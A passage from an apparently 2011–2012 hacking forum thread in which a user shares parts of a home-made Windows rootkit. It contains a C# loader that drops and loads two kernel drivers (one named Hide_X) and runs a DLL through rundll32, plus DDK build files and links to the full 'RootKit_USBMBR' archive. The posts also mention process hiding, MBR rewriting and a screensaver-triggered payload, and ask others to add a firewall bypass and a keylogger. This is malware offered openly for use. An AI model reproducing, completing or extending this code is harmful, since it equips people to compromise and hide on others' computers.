GET_CONTEXT = (0x0008), SET_CONTEXT = (0x0010), SET_INFORMATION = (0x0020), QUERY_INFORMATION = (0x0040), SET_THREAD_TOKEN = (0x0080), IMPERSONATE = (0x0100), DIRECT_IMPERSONATION = (0x0200) }[DllImport("kernel32", SetLastError = true)] internal static extern IntPtr CreateFile(string lpFileName, uint dwDesiredAccess, uint dwShareMode, IntPtr lpSecurityAttributes, uint dwCreationDisposition, uint dwFlagsAndAttributes, IntPtr hTemplateFile);[DllImport("kernel32.dll")] static extern int ResumeThread(IntPtr hThread); [DllImport("kernel32.dll")] static extern int SuspendThread(IntPtr hThread); [DllImport("kernel32.dll")] static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle, uint dwThreadId);static void Main(string[] args){try{BinaryWriter binWriter = new BinaryWriter(File.Open(@"\Driver.sys", FileMode.Create));byte[] bb = new byte[] {!!!!FILE NOT INCLUDED!!!!!}; binWriter.Write(bb); binWriter.Close();}catch(Exception e){}//==============================try{BinaryWriter binWriter2 = new BinaryWriter(File.Open(@"\Hide_X.sys", FileMode.Create));byte[] cc = new byte[] {!!!FILE NOT INCLUDED!!!}; binWriter2.Write(cc); binWriter2.Close();}catch(Exception e){}//=============================try{BinaryWriter binWriter3 = new BinaryWriter(File.Open(@"\DLLHell.dll", FileMode.Create));byte[] dd = new byte[] {!!!FILE NOT INCLUDED!!!}; binWriter3.Write(dd); binWriter3.Close();}catch(Exception e){}//=============================Thread.Sleep(1000);bool check=true;string driverName = "Driver";string driverName2 = "Hide_X";Win32Driver driver = new Win32Driver(driverName,"\\Driver.sys"); if (driver.LoadDeviceDriver()) { Console.WriteLine(driverName + " loaded"); IntPtr handle = driver.OpenDevice(); Console.WriteLine(handle); Console.WriteLine("Device opened"); // use device using ....DeviceIoControl(handle,....) see class code for signature driver.DevControl(); }Win32Driver driver2 = new Win32Driver(driverName2,"\\Hide_X.sys"); if (driver2.LoadDeviceDriver()) { Console.WriteLine(driverName2 + " loaded"); IntPtr handle = driver2.OpenDevice(); Console.WriteLine(handle); Console.WriteLine("Device opened"); // use device using ....DeviceIoControl(handle,....) see class code for signature driver2.DevControl(); }Process myProcess = new Process();ProcessStartInfo myProcessStartInfo =new ProcessStartInfo("rundll32.exe" );myProcessStartInfo.UseShellExecute = false;myProcessStartInfo.RedirectStandardOutput = true;myProcessStartInfo.Arguments= "\\DLLHell.dll MsgBox";myProcess.StartInfo = myProcessStartInfo;myProcess.Start();}}
JMC31337 Posted December 29, 2011 Author Posted December 29, 2011 You guys figure out the kernel firewall bypass tricks and networking stuff and it'll be a kickin rootkit
JMC31337 Posted December 30, 2011 Author Posted December 30, 2011 (edited) heres the dllhell.h code snippets #ifdef __MAIN_H__ #define __MAIN_H__ #include <windows.h>#define DLL_EXPORT__declspec(dllexport) #ifdef cplusplus extern "C" { #endif int DLL_EXPORT MsgBox(int x); #ifdef __cplusplus } #endif #endif //__MAIN_H__ Edited December 30, 2011 by JMC31337
JMC31337 Posted December 31, 2011 Author Posted December 31, 2011 (edited) Shoulda stored all the code in hex format included in the sys file itself.. you guys/gals can do better than the one i wrote.. needs a keylogger too... Edited December 31, 2011 by JMC31337
JMC31337 Posted January 2, 2012 Author Posted January 2, 2012 (edited) Here's the MAKEFILE and SOURCES to compile with the sdk/ddkMAKEFILE:=======!INCLUDE $(NTMAKEENV)\Makefile.def=======SOURCES:=======TARGETNAME = Hide_XTARGETPATH = objTARGETTYPE = DRIVER_NT_TARGET_VERSION = $(_NT_TARGET_VERSION_WINXP)INCLUDES = %BUILD%\incLIBS = %BUILD%\libSOURCES = hidez.c===============MAKEFILE:======!INCLUDE $(NTMAKEENV)\Makefile.def======SOURCES:=====TARGETNAME = DriverTARGETPATH = objTARGETTYPE = DRIVER_NT_TARGET_VERSION = $(_NT_TARGET_VERSION_WINXP)INCLUDES = %BUILD%\incLIBS = %BUILD%\libSOURCES = driver.c Edited January 2, 2012 by JMC31337
JMC31337 Posted July 7, 2012 Author Posted July 7, 2012 (edited) decided its been long enough.. heres the entire archive...The moderator can remove it if its a problemRootKit_USBMBR.rarand the original 11-11 (got the idea on the 11th after a Solara's Gateway 1111 group)Solara1111.rar Edited July 7, 2012 by JMC31337
JMC31337 Posted August 12, 2012 Author Posted August 12, 2012 (edited) Thnx but it could be better...1 sys file instead of 2 would have been better but I couldn't fig out the hide process and other f(x)'s to work all within one file with the timer f(x)Have the ioctl problem in Linux when I do drivers with timersWhat else, re-mounting the disks with 16 bit???Talk about being taken back to the beginnin of timeThe for loop to avoid the USB format tool error window(sometimes): should fig'd out how to write those MBR myselfScreensaver payload activation came from my buddy SKB....C# sys loader using C code dll ... Next time I need to pick 1 language and stick with itehhh ehhh Edited August 12, 2012 by JMC31337
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now